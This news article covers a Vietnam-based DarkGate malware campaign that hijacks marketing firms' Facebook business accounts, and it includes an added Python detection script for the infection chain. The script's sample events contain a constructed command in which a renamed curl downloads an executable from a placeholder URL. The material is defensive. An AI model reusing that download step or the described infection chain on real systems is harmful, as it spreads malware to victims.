Digital marketing firms in India, the US and the UK are having a hard time dealing with Vietnam-based hackers, and are facing malware attacks.

Marketing Firms in India, US, and UK Being Targeted by Hackers

Cybercriminal groups based in Vietnam are targeting digital marketing companies based in India, the US and the UK by hijacking corporate Facebook accounts in a malicious campaign, a new report has found.

According to cybersecurity company WithSecure, the popular malware “DarkGate” has been bundled with a Malware as a Service (MaaS) toolkit to infect victims with competing Remote Access Trojans (RATs) and additional data-stealing malware such as DuckTail, Lobshot, and Redline.

Researchers detected multiple infection attempts with the DarkGate malware targeting these countries on August 4.

The decoy documents, target templates, themes, delivery methods and general attack tactics are similar to recent DuckTail infostealer campaigns, according to the report.

DarkGate is a Remote Access Trojan (RAT) that first appeared in cyberspace in 2018. It is usually offered to cybercriminals as a Malware-as-a-Service tool.

Researchers examined open-source data related to the DarkGate malware campaign and found links to multiple repositories. This pattern indicates that these attacks are carried out by the same group or threat actor.

“By identifying the characteristics of the DarkGate malware decoys and campaigns, we have been able to identify several pivot points that lead to other data stealers and malware being used in very similar, if not identical, campaigns, and it is estimated that these campaigns are likely to be carried out by the same group of threat actors,” the researchers said.

According to the report, the attack started from a file named Salary and new products.8.4.zip. When unsuspecting users downloaded and unzipped it, a VBS script was activated.

This script renamed and cloned the original Windows binary (Curl.exe) to a new location before connecting to the external server to retrieve two additional files: autoit3.exe and the compiled Autoit3 script.

The script then ran the executable, then de-obfuscated and assembled the DarkGate RAT using strings contained in the script.
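Detection logic for the chain described above, added here as an example and not taken from the WithSecure report. It assumes process-creation telemetry that uses Sysmon Event ID 1 field names; the events, hosts, paths, URLs and rule names are constructed for illustration.

```python
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Constructed process-creation records (Sysmon Event ID 1 field names).
# Hosts, paths and the example.invalid URLs are made up for illustration.
SAMPLE_EVENTS = [
    {"host": "ws-01", "Image": r"C:\Windows\System32\wscript.exe",
     "OriginalFileName": "wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\a\Downloads\doc.vbs"'},
    {"host": "ws-01", "Image": r"C:\tmp\xfer.exe",
     "OriginalFileName": "curl.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"xfer.exe -o C:\tmp\Autoit3.exe http://example.invalid/a"},
    {"host": "ws-01", "Image": r"C:\tmp\Autoit3.exe",
     "OriginalFileName": "AutoIt3.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"C:\tmp\Autoit3.exe C:\tmp\script.au3"},
    {"host": "ws-02", "Image": r"C:\Windows\System32\curl.exe",
     "OriginalFileName": "curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe https://example.invalid/health"},
]

def base(path):
    """Lower-cased file name of a Windows path (works on any OS)."""
    return ntpath.basename(path).lower()

def is_renamed_curl(ev):
    # Version-info name still says curl.exe, but the file on disk is named otherwise.
    return ev["OriginalFileName"].lower() == "curl.exe" and base(ev["Image"]) != "curl.exe"

def detect(events):
    """Return (host, rule) findings in event order."""
    findings, hosts_with_renamed_curl = [], set()
    for ev in events:
        host = ev["host"]
        if is_renamed_curl(ev):
            hosts_with_renamed_curl.add(host)
            from_script = base(ev["ParentImage"]) in SCRIPT_HOSTS
            findings.append((host, "renamed_curl_from_script_host" if from_script else "renamed_curl"))
        elif base(ev["Image"]) == "autoit3.exe" and host in hosts_with_renamed_curl:
            # AutoIt alone is common admin tooling; it is flagged only after a renamed curl copy.
            findings.append((host, "autoit3_after_renamed_curl"))
    return findings

if __name__ == "__main__":
    for host, rule in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The unrenamed curl.exe on ws-02 produces no finding, which is the point of comparing the version-info name with the on-disk name rather than matching on curl alone.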

“Based on our findings, it is highly likely that a single actor is behind several of the campaigns we are monitoring targeting Meta Business accounts,” said Stephen Robinson, senior threat intelligence analyst.

After gaining control of an account, attackers can engage in a variety of malicious activities, including malware distribution and fraud, the report warns.
